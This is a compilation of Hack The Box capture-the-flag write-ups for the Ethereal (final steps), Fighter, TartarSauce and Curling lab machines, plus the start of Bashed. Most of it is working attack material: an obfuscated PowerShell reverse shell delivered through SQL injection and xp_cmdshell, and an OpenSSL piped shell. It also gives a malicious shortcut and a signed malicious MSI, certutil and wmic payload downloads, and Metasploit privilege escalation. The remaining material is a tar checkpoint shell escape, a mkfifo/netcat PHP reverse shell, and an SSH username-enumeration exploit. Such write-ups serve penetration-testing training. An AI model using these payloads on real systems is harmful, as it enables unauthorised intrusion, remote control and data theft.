8. Enumerate the firewall rules, netsh advfirewall firewall show rule name=all is the command to view the windows firewall rules, but can not be executed normally in the RCE environment, so you need to find a writable path, dump the results into a file, and then Use the type method to retrieve the content. Usually the c:\users\public directory is the path with the lowest privilege, but the direct write is a failure. Try to use the icacls command to enumerate the directory permissions. Finally, the current user alan can be written to C:\users\public\desktop\ Shortcuts\, eventually read the firewall configuration: only TCP 73 and 136 ports are allowed to communicate.
Enumeration permissions:

On the ping page, I tried to do the ‘netsh advfirewall firewall show rule name=all’ but piping that to an nslookup will always crash the webpage, so
I did the following instead

127.0.0.1 & netsh advfirewall firewall show rule name=all|findstr "Rule Name:"|findstr "Allow" > C:\users\public\desktop\shortcuts\firewall.rulename.allow

This will generate a file called firewall.rulename.allow and it is stored in a subfolder under public, that is a folder  Ethereal\Alan has write access to).
Now we read the file using the method above, We display the firewall rule names

127.0.0.1 & for /f "tokens=1,2,3,4,5,6,7,8" %a in ('type c:\users\public\desktop\shortcuts\firewall.rulename.allow') do nslookup %a.%b.%c.%d.%e.%f.%g.%h 10.10.14.20

result:

root@kali:~/htb/ethereal# responder -I tun0
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.20]
Challenge set [random]
Don't Respond To Names ['ISATAP']

[+] Listening for events...
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Request
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.UDP.Port.53
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.TCP.Ports.73.136
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.Port.80.8080
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Request
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply

Continue to search for clues in the system, use dir to retrieve the C drive, and finally find the Openssl-v1.1.0 version installed in the C:\Program Files (x86) directory, we will use it to implement the shell.
A command that displays a more complete dir result:

127.0.0.1 & cmd.exe /V /C "for /f " delims= " %e in ('DIR /B C:\') do cmd /c nslookup -querytype=A %e.a.a 10.10.14.20"

10. The CS working mode of openssl is not familiar to me, so first build the simulation environment locally, the official website https://www.openssl.org can check the command parameters, and download the source code, but there is no installation package. The installation packages for each version can be downloaded at http://slproweb.com/products/Win32OpenSSL.html . The installation process is all the way to the next.

Openssl for windows

11. On the kali side, first set up the openssl server. You need a private key and a certificate, so run the command:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
then have some Certificate information needs to be filled in, free to do it, format is no problem, such as e-mail, country shorthand
For questions about command parameters, please refer to the IBM documentation:
https://www.ibm.com/support/knowledgecenter/en/SSWHYP_4.0.0 /com.ibm.apimgmt.cmc.doc/task_apionprem_gernerate_self_signed_openSSL.html

Generate certificate

12. Using openssl’s s_client to connect to the server, the test in the simulation environment found that the work of openssl is somewhat like the nc without the -e option, what you input, what the other party displays, and can not execute the command. It is conceivable to use the pipe character to redirect input and output, that is, to redirect an openssl connection to cmd.exe via the pipe character “|”, and then use a pipe character “|” to redirect the operation result to openssl. A connection. In short:
openssl s_client 1 —->input | cmd.exe | openssl s_client 2 —->output
This is why firewall rules are going to release two ports.
The RCE command that translates to the web side is:

127.0.0.1 & START "" cmd /c "C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cmd.exe |C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:136"
Note that in the actual attack target, we have to open two terminals at the same time, one openssl server 73 and another openssl Server 136, server listening command:
openssl s_server -quiet -key key.pem -cert cert.pem -port 73
openssl s_server -quiet -key key.pem -cert cert.pem -port 136
I enter in port 73 port Command and press Enter, then submit the above RCE command on the web side to push the input into the pipeline, and view the result in the terminal of port 136.
13. After getting a low-privileged shell, we can get the next step in the c:\users\alan\Desktop path. He told us that there is a VS shortcut in the Public Desktop path, let us use it.
Lead file

14. Create  a malicious lnk shortcut  with powershell

PS C:\Users\jacco> $WScript = New-Object -ComObject 'wscript.shell'
PS C:\Users\jacco $SC = $WScript.CreateShortcut('Puckie.lnk')
PS C:\Users\jacco $SC


FullName : C:\Users\jacco\Puckie.lnk
Arguments :
Description :
Hotkey :
IconLocation : ,0
RelativePath :
TargetPath :
WindowStyle : 1
WorkingDirectory :

PS C:\pentest> $SC.TargetPath="C:\windows\system32\cmd.exe"
PS C:\pentest> $SC.Arguments="/c c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cm
d c:\progra~2\openssl-v1.1.0/bin\openssl.exe s_client -connect 10.10.14.20:136"
PS C:\Users\jacco $SC

FullName : C:\Users\jacco\Puckie.lnk
Arguments : /c c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cmd
c:\progra~2\openssl-v1.1.0/bin\openssl.exe s_client -connect 10.10.14.20:136
Description :
Hotkey :
IconLocation : ,0
RelativePath :
TargetPath : C:\Windows\System32\cmd.exe
WindowStyle : 1
WorkingDirectory :

PS C:\Users\jacco> $SC.Save()
PS C:\Users\jacco> dir C:\users\jacco\*.lnk

Directory: C:\users\jacco

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/4/2019 7:39 PM 1219 Puckie.lnk

The malicious shortcuts are as follows, you can see the commands that need to be executed at the shortcut target bar.

15. Upload a malicious shortcut and override c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk. Note that uploading a .lnk file directly may fail and can be renamed to a .txt suffix upload. The upload process also utilizes the pipeline, but the original connection must be disconnected first.

Kali Run: openssl s_server -quiet -key key.pem -cert cert.pem -port 73 < malicious.txt
web run: 10.10.14.20|C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 > c:\users\public\desktop\shortcuts\out.txt (note that the suffix is ​​changed after the upload is successful)
Re-establish the shell connection
shell run: del “c:\users\public\desktop \shortcuts\Visual Studio 2017.lnk” & copy “c:\users\public\desktop\shortcuts\out.lnk” “c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk”

16. Soon to get a new shell, in this shell, do not need to rely on the web, you can directly enter in 73, view the results in 136, the operation is smooth, a lot of user.txt in the jorge user desktop
User.txt

17. Continue to search. You can find that there are two suspicious folders on the D drive, one is Certs, which contains the certificate file, and the other is the DEV folder, which stores another clue file. This clue is well understood. As long as a malicious msi installation package is generated and placed in this path, the Rupal user will come to the point and combine the certificate file. This is probably to generate a signed msi.

Lead file 2

18. Direct type certificate files will be garbled and cannot be copied. At present, we do not have a download channel, so I thought of using the base64 encoding function of openssl to print out the content, the command is as follows:
C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in MyCA.cer
C: \Progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in MyCA.pvk copies
the base64 encoded text to kali and restores it with base64 -d decoding.

Obtain a certificate

19. Generate msi, we use the graphical interface of the EMCO MSI Package Builder to operate. First create a new project, then click Custom Actions, right-click on the new Pre-Post Actions button, and fill in the key parameters to create the MSI Package. (The password is left blank)

Malicious msi generation

20. Sign the msi with the downloaded certificate. This requires .NET Framework 4 and winsdk, which can be downloaded at:
.NET Framework 4: https://www.microsoft.com/en-us/download/details.aspx?id=17851
winsdk: https: //www.microsoft.com/en-us/download/confirmation.aspx?id=8279 Once
installed, you can start signing. The commands are as follows:
makecert -n “CN=Ethereal” -pe -cy end -ic C:\MyCA.cer -iv C:\MyCA.pvk -sky signature -sv C:\hack.pvk C:\hack.cer
pvk2pfx -pvk C:\hack.pvk -spc C:\hack.cer -pfx C:\hack.pfx
signtool sign /f C:\hack.pfx C:\shell.msi
If the signature is successful, you can see the following prompt:

Successful signature

21. Upload the signed msi to d:\dev\msis\shell.msi, then exit the two openssl connections of 73 and 136 and listen to them again. In about 1 minute, the rupal user’s shell will go online. Read root.txt in his Desktop path

1cb6f1fc220e3f2fcc0e3cd8e2d9906f

22. If the deployment of msi is not successful, you need to try the second time. You must regenerate an msi and sign the upload. Because the installed msi is already registered in the system, it will not run again. You can add it from the control panel. I saw them in the removal program, but now in this environment we have no way to uninstall the msi installed before.

Author : Jacco Straathof

HTB – Fighter

Today we are going to solve another CTF challenge “Fighter”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Fighter is 10.10.10.72

Let’s start off with our basic nmap command to find out the open ports and services.

C:\Users\jacco>nmap -sC -sV -T4 10.10.10.72
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-24 09:46 W. Europe Summer Time
Nmap scan report for streetfighterclub.htb (10.10.10.72)
Host is up (0.029s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: StreetFighter Club
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.67 seconds

The Nmap output shows us that there is only 1 port open: 80(HTTP)

We find that port 80 is running http, so we open the IP in our browser.

In the homepage, we find the Domain name “streetfighterclub.htb”. We add the domain to our /etc/hosts file.

We don’t find anything new on the webpage, but further looking into the webpage we find that there might be subdomains available that will give us more clues. We intercept the request and send it to the intruder. We select where we want to brute force the request.

We select the wordlist, we use namelist.txt located in /usr/share/dnsrecon/.

After bruteforcing, we find a subdomain called “members.streetfighterclub.htb” that gave HTTP code 403.

We add the subdomain in /etc/hosts so that we can access the web site.

We open the webpage and got a 403 Forbidden error.

We now run a dirb scan on the members.streetfighter.htb and find a directory called “old”.

dirb http://members.streetfighterclub.htb/

We then find web pages inside that directory. As we know that it is IIS server we find “asp” files on the web server and find a page called “login.asp”.

dirb http://members.streetfighterclub.htb/old -X .asp

We open the web page and find a login page.

We enumerate the webpage and find that the web application is vulnerable to SQL injection.  We find username, password, and e-mail but were unable to login. So we tried command injection using SQL injection. We referred this link.

POST /old/verify.asp HTTP/1.1
Host: members.streetfighterclub.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://members.streetfighterclub.htb/old/Login.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 944
Connection: close
Cookie: ASPSESSIONIDACRSQCAA=PDDFFGAADNIIKGMMCKGJFIPB; Email=; Level=%2D1; Chk=1821; password=YWRtaW4%3D; username=YWRtaW4%3D
Upgrade-Insecure-Requests: 1

username=admin&password=admin&logintype=1%3bEXEC+sp_configure+'show+advanced+options',+1%3bRECONFIGURE+WITH+OVERRIDE%3bEXEC+sp_configure+'xp_cmdshell',+1%3bRECONFIGURE+WITH+OVERRIDE%3bdrop+table+fighter%3bcreate+table+fighter+(out+varchar(8000))%3binsert+into+fighter+(out)+execute+Xp_cMdsHelL+'C%3a\WIndOWs\sySwOw64\WINdOwspOweRshEll\v1.0\poWersHeLl.Exe+"$clIEnT+%3d+NEw-ObJect+SYstEm.nEt.SOckEts.TcPclIeNt(\"10.10.14.20\",80)%3b$stReAm+%3d+$clIEnT.GetsTrEam()%3b[byte[]]$bYtEs+%3d+0..65535|%25{0}%3bwHIle(($i+%3d+$stReAm.Read($bYtEs,+0,+$bYtEs.LEnGth))+-ne+0){%3b$dAta+%3d+(NEW-oBjecT+-TypeNAme+SYsTem.tExt.ASCIiENcoDing).GEtstRInG($bYtEs,0,+$i)%3b$sEndback+%3d+(iEX+$data+2>%261+|+OUt-stRing+)%3b$Sendback2+%3d+$sEndback+%2b+\"sH3lL+\"+%2b+(pWd).PAth+%2b+\"^>+\"%3b$senDbyte+%3d+([texT.eNCodIng]%3a%3aAScIi).GEtByTes($Sendback2)%3b$stReAm.WRite($senDbyte,0,$senDbyte.Length)%3b$stReAm.FLuSh()}%3b$clIEnT.CloSe()"'%3b&rememberme=ON&B1=Login

 

We set up our listener and got a reverse shell.

C:\Users\jacco>nc -lvp 80
listening on [any] 80 ...
connect to [10.10.14.20] from streetfighterclub.htb [10.10.10.72] 49440
whoami
fighter\sqlserv

We are not able to find anything on the target machine. So we try to convert our shell into meterpreter but are unable to run any exe file. So there was a firewall that didn’t allow us to run any exe file. We got a reference through this link on how to bypass this. We use the nps payload to create an XML file that will contain our payload (download from here).

We move into “c:\users\sqlserv” as we have a shell as user sqlserv.

We run the command provided by npc payload to start our listener.

msfconsole -r msbuild_nps.rc

We start our python HTTP Server to send our file to the target machine.

python -m SimpleHTTPServer 80

We download the file using certutil.exe on the target machine.

certutil.exe -urlcache -split -f http://10.10.14.3/msbuild_nps.xml msbuild_nps.xml

We then run the XML file we uploaded using msbuild.exe.

As soon as we run the file we get a meterpreter session. As we can see by running sysinfo we have a 32-bit meterpreter session on a 64-bit machine.

To convert it into 64-bit session, we check the processes and find the 64-bit running process. We then migrate our process to a 64-bit process and get a 64-bit session.

meterpreter > ps
meterpreter > migrate 2320

We still don’t find anything to escalate our privilege. As this machine on street fighter game, we try to google street fighter exploit and find that street fighter 5 has privilege escalation vulnerability. We find that street fighter has a service called Capcom, so we check if street fighter 5 is installed on the target machine.

sc query capcom

We find this Metasploit exploit here, we try to run it but are unable to get a shell as it gave an error stating that the system was not vulnerable. So we make changes to the code and comment out the section where it checks the OS version.

Now we are successfully able to run the exploit.

msf > use exploit/windows/local/capcom_sys_exec
msf exploit(windows/local/capcom_sys_exec) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/capcom_sys_exec) > set lhost tun0
msf exploit(windows/local/capcom_sys_exec) > set lport 80
msf exploit(windows/local/capcom_sys_exec) > set session 2
msf exploit(windows/local/capcom_sys_exec)> run

When we check the uid we find that we are successfully able to get administrative rights.

We enumerate the directories to find the flags and inside “c:\users\decoder\Desktop”, we find a file called “user.txt”. When we take look at the content of the file we find our first flag.

We move into c:\users\Administrator\Desktop and find a file called “root.exe”. We run it and find that it asks for a password. There is also a DLL file called “checkdll.dll”, as the password might be checked using this DLL file.

We download both the files into our system using meterpreter.

download root.exe /root/Desktop
download checkdll.dll /root/Desktop

We reverse engineer them using IDA and find that this program XOR’s 9 with each character of the variable aFmFeholH. Now analyzing with IDA tells us that the variable contains “FmfEhO1}h”.

So we create a c program that XOR’s 9 with each character of “FmfEhO1}h”.

We compile and run the file and get the password to be “OdioLaFeta”.

When we provide the password to the root.exe we get our final flag.

With help of Empire

bypass the defender starfighter_xsl from empire by Luis Vacas
For this we are going to develop a small python script that makes us run our .xsl and get empire agent :

root@kali:~/htb/fighter# python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
10.10.10.72 - - [26/Apr/2019 11:03:33] "GET /WOJO.XSL HTTP/1.1" 200 -
root@kali:~/htb/fighter# cat iron.py
from requests import *

params = {"username":"admin","password":"admin","B1":"LogIn","logintype":"1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xP_cmDshEll', 1;RECONFIGURE WITH OVERRIDE;drop table mojones;create table mojones (out varchar(8000));;insert into mojones (out) execute xp_CmdSheLl 'start wmic process get brief /format:\"http://10.10.14.20:443/wojo.xsl\"';EXEC sp_configure 'xP_cMdShelL', 0;RECONFIGURE WITH OVERRIDE;"}

resp = post("http://members.streetfighterclub.htb/old/verify.asp",data=params,allow_redirects=False,cookies={"ASPSESSIONIDCARRRDBA":"IFMBKKKDLPNKELDDENPKDKNB"})
.
.

Let’s migrate the empire to metasploit:https://github.com/trustedsec/nps_payload (example of use)

1
2
3
cd C:\Users\sqlserv
upload /tmp/msbuild_nps.xml msbuild_nps.xml
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe msbuild_nps.xml


Author: Jacco Straathof

reference used: https://ironhackers.es/en/writeups/hackthebox/writeup-fighter-hackthebox/

 

HTB – TartarSauce

Today we are going to solve another CTF challenge “TarTarSauce”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of TarTarSauce is 10.10.10.88

Let’s start off with our basic nmap command to find out the open ports and services.

C:\Users\jacco>nmap -sC -sV -T4 10.10.10.88
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-08 15:13 W. Europe Summer Time
Nmap scan report for 10.10.10.88
Host is up (0.034s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.00 seconds
Let’s navigate to port 80 through a web browser. By exploring IP in the URL box, it puts up following web page as shown in the below image.

We don’t find anything on the webpage, so we run dirb to enumerate the directories. We find a directory called “/webservices/”. We further enumerate “/webservices/” as we don’t find anything in that directory.

Dirb scan gave us the directory called “/webservices/wp/” that hosts a WordPress site.

We run wpscan to enumerate the themes and plugins and find a vulnerable plugin called “Gwolle Guestbook”. We search for the exploit and find that it is vulnerable to Remote File Inclusion (RFI).

Advisory ID: HTB23275
Product: Gwolle Guestbook WordPress Plugin
Vendor: Marcel Pol
Vulnerable Version(s): 1.5.3 and probably prior
Tested Version: 1.5.3
Advisory Publication:  October 14, 2015  [without technical details]
Vendor Notification: October 14, 2015 
Vendor Patch: October 16, 2015 
Public Disclosure: November 4, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8351
Risk Level: Critical 
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.  

HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

We follow the instructions according to the given POC on exploit-db and use the php-reverse-shell.php available on Kali Linux. We copy it to desktop and rename it to wp-load.php to execute our php shell using RFI. We start our python HTTP server to exploit RFI on the target machine.

c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.88 - - [08/Apr/2019 15:04:19] "GET /wp-load.php HTTP/1.0" 200 -
C:\Users\jacco>curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.20/

We set up our listener using netcat; as soon as we execute our php shell through RFI, we are successfully able to get a reverse shell. We go to “/home” directory and find a folder called “onuma”. We are unable to access the “onuma” directory. So we spawn a tty shell using python to check the sudoers list.We check the sudoers list and find that we can run tar as user “onuma” without any password. Hence we can exploit wild card injection for privilege escalation.

We’ll take advantage of the tar options for checkpoints. The --checkpoint=x flag tells tar to take some action every x bytes, as a progress update. The default behavior is to print a status message. However, the --checkpoint-action parameter allows the user to specify what action to take at a check point. So I can have it just give me a shell:

C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.88: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.88] 58770: NO_DATA
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 i686 i686 GNU/Linux
10:06:50 up 16:51, 0 users, load average: 0.01, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@TartarSauce:/$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash <ll /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
onuma@TartarSauce:/$ id
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
onuma@TartarSauce:/$ ls
ls
bin dev home lib media opt root sbin srv tmp var
boot etc initrd.img lost+found mnt proc run snap sys usr vmlinuz
onuma@TartarSauce:/$ cat /home/onuma/user.txt
cat /home/onuma/user.txt
b2d*****2c7

i use pspy for processes detection. here, letting pspy32 run for a bit shows a script that runs as root every 5 minutes:

2018/05/29 07:56:33 CMD: UID=0    PID=24065  | /bin/bash /usr/sbin/backuperer

Enumerating through the system we find a file a called a backuperer that has been symlinked to a file a named “backup” in “/usr/local/bin directory”.

We take a look at the content of the file and find that it is a file that creates a gzip archive of files inside “/var/www/html/”. It also checks the integrity of the file after 30 seconds from the creation of the file.

We use a script that takes advantage of the “sleep” function of the script. As it waits for 30 seconds and then checks the integrity of the file we have 30 seconds to recreate the archive. We use this script here.  After running the script we find the root flag.

Author: Sayantan Bera

HTB – Curling

Today we are going to solve a CTF Challenge “Curling”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. These labs are designed for beginner to the Expert penetration tester. Tally is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

As these labs are only available online, therefore, they have a static IP. Curling has IP: 10.10.10.59.

Now, as always let’s begin our hacking with the port enumeration.

We see a blog titled “Cewl Curling site!” , and it’s joomla. At this point I would run joomscan but I wanted to do some manual enumeration first , so I checked the source of the page and at the end of the body I found this comment :

So I checked /secret.txt and found this base64 string :

c:\PENTEST>curl http://10.10.10.150/secret.txt
Q3VybGluZzIwMTgh

Decoding :

PS C:\Users\jacco> [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("Q3VybGluZzIwMTgh"))
Curling2018!

Curling2018! we can use that as a password. But what is the username ? If we take a look at the main page again and read the posts :

We will notice a name in one of the posts : Floris , now we can try to login as floris with the password Curling2018! :

And it worked. While I was doing this enumeration I ran wfuzz in the background and got these results :

c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.150/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.150/FUZZ
Total requests: 220551

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

000007:  C=301      9 L       28 W          313 Ch        "images"
000005:  C=200    361 L     1051 W        14261 Ch        ""
000001:  C=200    361 L     1051 W        14261 Ch        "# directory-list-2.3-medium.txt"
000002:  C=200    361 L     1051 W        14261 Ch        "#"
000003:  C=200    361 L     1051 W        14261 Ch        "# Copyright 2007 James Fisher"
000004:  C=200    361 L     1051 W        14261 Ch        "#"
000071:  C=301      9 L       28 W          312 Ch        "media"
000072:  C=301      9 L       28 W          316 Ch        "templates"
000136:  C=301      9 L       28 W          314 Ch        "modules"
000474:  C=301      9 L       28 W          310 Ch        "bin"
000510:  C=301      9 L       28 W          314 Ch        "plugins"
000629:  C=301      9 L       28 W          315 Ch        "includes"
000861:  C=301      9 L       28 W          315 Ch        "language"
000996:  C=301      9 L       28 W          317 Ch        "components"
001074:  C=301      9 L       28 W          312 Ch        "cache"
001240:  C=301      9 L       28 W          316 Ch        "libraries"
003228:  C=301      9 L       28 W          310 Ch        "tmp"
003538:  C=301      9 L       28 W          314 Ch        "layouts"
005680:  C=301      9 L       28 W          320 Ch        "administrator"
012477:  C=404      9 L       32 W          279 Ch        "axs"
Finishing pending requests...

Also used OpenSSH 2.3 < 7.7 – Username Enumeration (PoC)

root@kali:~/htb/curling# cat 45210.py 
#!/usr/bin/env python

# Copyright (c) 2018 Matthew Daley
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# IN THE SOFTWARE.


import argparse
import logging
import paramiko
import socket
import sys


class InvalidUsername(Exception):
pass


def add_boolean(*args, **kwargs):
pass


old_service_accept = paramiko.auth_handler.AuthHandler._handler_table[
paramiko.common.MSG_SERVICE_ACCEPT]

def service_accept(*args, **kwargs):
paramiko.message.Message.add_boolean = add_boolean
return old_service_accept(*args, **kwargs)


def userauth_failure(*args, **kwargs):
raise InvalidUsername()


paramiko.auth_handler.AuthHandler._handler_table.update({
paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
})

logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())

arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('hostname', type=str)
arg_parser.add_argument('--port', type=int, default=22)
arg_parser.add_argument('username', type=str)
args = arg_parser.parse_args()

sock = socket.socket()
try:
sock.connect((args.hostname, args.port))
except socket.error:
print '[-] Failed to connect'
sys.exit(1)

transport = paramiko.transport.Transport(sock)
try:
transport.start_client()
except paramiko.ssh_exception.SSHException:
print '[-] Failed to negotiate SSH transport'
sys.exit(2)

try:
transport.auth_publickey(args.username, paramiko.RSAKey.generate(2048))
except InvalidUsername:
print '[*] Invalid username'
sys.exit(3)
except paramiko.ssh_exception.AuthenticationException:
print '[+] Valid username'
root@kali:~/htb/itvitae# pip install paramiko==2.0.8
root@kali:~/htb/itvitae# python 45210.py --p 22 10.10.10.150 floris
/usr/local/lib/python2.7/dist-packages/paramiko/ecdsakey.py:202: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
signature, ec.ECDSA(self.ecdsa_curve.hash_object())
/usr/local/lib/python2.7/dist-packages/paramiko/rsakey.py:110: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
algorithm=hashes.SHA1(),
[+] Valid username

Let’s go to /administrator and login to the administration panel :


Editing Template Files and Getting a Reverse Shell :

On the configuration section there’s an option for templates :

By going to that we notice that protostar is the default style and template :

From templates we will go to Protostar Details and Files and create a new php file :

 

In the php file we will execute a system command to get a reverse shell :

<?php
    system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 443 >/tmp/f');
?>

After we save the file we will go to http://10.10.10.59/templates/protostar/puckie.php

Then we check our listener :

c:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.150: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.150] 55960: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

User

We got a reverse shell as www-data , in the /home directory there’s a directory for floris :

We don’t have read access to user.txt , but we notice a file called password_backup , by looking at that file :

It’s a hex dump file , So I copied it to my box to reverse it :

To reverse a hex dump file we will use xxd , so xxd -r pw_backup :

Not a normal output , let’s redirect the output to a file and see :

So what happened is , it turned out to be a bzip2 file so I decompressed it then got a new gzip file , decompressed it and got another bzip2 file , after decompression I got a tar file , then finally a txt file for the password :

Let’s ssh as floris :

And we owned user !


Curling

By looking at the /home directory of floris again :

There’s a directory called admin-area which contains two files :

input and report

input :

url = "http://127.0.0.1"

report :

It’s obvious that this is the output of executing curl on http://127.0.0.1 :

Even the name of the box is a hint curling , so what about changing that url from localhost to something else like a file ? Next time the command gets executed we will get the contents of that file , maybe root.txt ? But only if it’s getting executed by root. Let’s try and see if it will work :

Then we will do : watch cat report , this is executing cat report every 2 seconds and giving us the output , easier than checking manually :

After some time we get the flag.


Dirty Sock ? Root shell !

I didn’t like the fact that I could only read the flag , I wanted a root shell. So I tried for a long time to bypass the url thing and get a reverse shell , but couldn’t. Then when I did this box again for the write-up , one of the things that caught my attention is that we are on an ubuntu box , so I checked snap version to know if it’s vulnerable to CVE-2019-7304 known as Dirty Sock and of course it was :

This is not intended at all because by the time this box was released , CVE-2019-7304wasn’t disclosed yet.

I got the exploit from here , Then hosted it on a python simple http server and downloaded it on the box :

python3 dirty_sockv2.py 

Now we can su to dirty_sock and execute commands as root :

Or just sudo su and we will get a root shell :

HTB – Bashed

Today we are going to solve a CTF Challenge “Bashed”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs which are designed for beginners to the expert penetration testers. Bashed is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online, therefore, they have a static IP. Bashed Lab has IP: 10.10.10.68.

Now, as always let’s begin our hacking with the port enumeration.

C:\Users\jacco>nmap -sC -sV 10.10.10.68
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-03 18:45 W. Europe Summer Time
Nmap scan report for 10.10.10.68
Host is up (0.030s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
